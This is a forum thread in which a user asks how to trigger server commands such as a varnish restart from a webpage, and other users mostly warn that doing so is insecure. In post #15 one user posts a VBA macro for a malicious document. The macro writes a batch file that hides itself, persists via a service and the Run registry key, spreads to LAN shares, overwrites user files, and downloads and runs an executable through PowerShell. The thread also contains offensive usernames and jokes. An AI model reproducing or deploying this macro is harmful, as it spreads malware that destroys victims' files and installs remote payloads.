User Controls

Issuing shell commands from a webpage?

  1. #1
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    I would like to be able to basically do a couple of commands - eg service varnish restart (as root) from a webpage.

    Is that doable?
  2. #2
    -SpectraL coward [the spuriously bluish-lilac bushman]
    /etc/varnish/default.vcl

    backend default {
    .host = "localhost";
    .port = "8080";
    }
  3. #3
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    Lol, that looks familiar alright.

    Anyway I have my vcl file as good as I'm going to get it for now.
  4. #4
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    And varnish is supporting 1000 simultaneous requests, which is A) awesome and B) the goal.

    Now it's time to worry about allowing people to actually update the website, keeping in mind that the backend takes like 6 seconds to respond, so allowing clients to hit it simply isn't an option.

    Which means that a cache-warming strategy is a necessity. Which we have, but I need to be able to call it without requiring an SSH session.
  5. #5
    aldra JIDF Controlled Opposition
    https://gist.github.com/rshipp/eee36684db07d234c1cc
  6. #6
    Admin African Astronaut
    Its actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.
  7. #7
    Lanny Bird of Courage
    Originally posted by Admin Its actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.

    Yeah, this. You can stand up a small web server that runs a commands taken from requests to it but that's wildly insecure and basically backdooring yourself. You can set it up to run a specific command when a request is made but you have to worry about things like "what happens if someone requests this a thousand times in a second" or "do I take any parameters from the request that can be open me up to injection attacks" and such. And if you're spawning a shell you have to ask "who's profile is this sourcing and what happens when that changes".

    I mean in some sense every HTTP request is "run some command on a remote server and maybe provide some data back" but shells and subprocesses are tricky and just require you to think about all the ways that they can be exploited or fail.
  8. #8
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    Thanks.

    I got the cache refreshing just fine using by getting varnish to serve up files, and also refresh the cache object after the file has been served. This enables the people updating the site to avoid having to use any control interface beside just waiting 10 seconds and refreshing, and also ensures no customer ever has to wait for the slow-ass backend to work.

    TBH setting it up was all far more complicated than it should have been.
  9. #9
    Sophie Pedophile Tech Support
    If you absolutely have to spawn a shell. Permission jail it. Make sure it can't do anything else than what you want it to do, read up on breaking out of a jailed shell too if you wanna do your due diligence. I'd council against it in general though. It's a good way of getting owned.
    The following users say it would be alright if the author of this post didn't die in a fire!
  10. #10
    aldra JIDF Controlled Opposition
    yeah I would not recommend using it more than once. if you need remote terminal access set up ssh

    ***or in your case, some sort of conditional trigger for the script
  11. #11
    Fonaplats victim of incest [daylong jump-start that nome]
    Just message her on FB.
    The following users say it would be alright if the author of this post didn't die in a fire!
  12. #12
    Admin African Astronaut
    It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.
  13. #13
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Admin It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.

    Best to setup a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire harddrive instead.
  14. #14
    Sophie Pedophile Tech Support
    Originally posted by Admin It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.

    Security through obscurity has dubious utility. In my estimation it should be something you set up as a complimentary measure.
  15. #15
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL Best to setup a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire harddrive instead.

    You're over thinking it. Just set up a regular honeypot, put some important looking documents in there somewhere. But make sure all these documents are actually MalDocs.

    In fact i'm taking a little break from coding at the moment but i had this open in my text editor as well.


    Public Sub ware()

    Const s = "c:\s.bat"

    Dim FileNumber As Integer
    Dim retVal As Variant

    FileNumber = FreeFile

    'creat batch file
    Open s For Output As #FileNumber
    Print #FileNumber, "@echo off"
    Print #FileNumber, "set gg=0"
    Print #FileNumber, "set servicename=DE"
    Print #FileNumber, "echo sc create %servicename% binpath=%0 >> service.bat"
    Print #FileNumber, "echo sc start %servicename% >> service.bat"
    Print #FileNumber, "attrib +h +r +s service.bat"
    Print #FileNumber, "start service.bat"
    Print #FileNumber, "reg add "; HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run; " /v "; Windows; Services; " /t "; REG_SZ; " /d %0"
    Print #FileNumber, "attrib +h +r +s %0"
    Print #FileNumber, ":abdhd"
    Print #FileNumber, "net use Z: \\192.168.1.%gg%\C$"
    Print #FileNumber, "if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.bat""
    Print #FileNumber, "mountvol Z: /d)"
    Print #FileNumber, "if %i% == 256 (goto infect) else (set /a i=i+1)"
    Print #FileNumber, "goto abdhd"
    Print #FileNumber, ":infect"
    Print #FileNumber, "for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)"
    Print #FileNumber, "for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)"
    Print #FileNumber, ":payload"
    Print #FileNumber, "powershell -Command "(New-Object Net.WebClient).DownloadFile('Direct Link Here', 'Download_Execute.exe')""
    Print #FileNumber, "powershell -Command "Invoke-WebRequest <Direct Link Here> -OutFile Downoad_Execute.exe""
    Print #FileNumber, "start %USERPROFILE%\Downloads\Download_Execute.exe"
    Close #FileNumber

    'run batch file
    retVal = Shell(MY_FILENAME, vbNormalFocus)

    ' NOTE THE BATCH FILE WILL RUN, BUT THE CODE WILL CONTINUE TO RUN.
    If retVal = 0 Then
    MsgBox "An Error Occured"
    Close #FileNumber
    End
    End If

    'Delete batch file
    Kill MY_FILENAME

    End Sub


    I didn't write this but i was messing around with it the other day. I also found out that LibreOffice supports Macros as well. So instead of jumping through hoops with executables and batch files and random PowerShell invocations and shit, you could have your Macro simply download a python script and execute it directly if the adversary is on Linux.
Jump to Top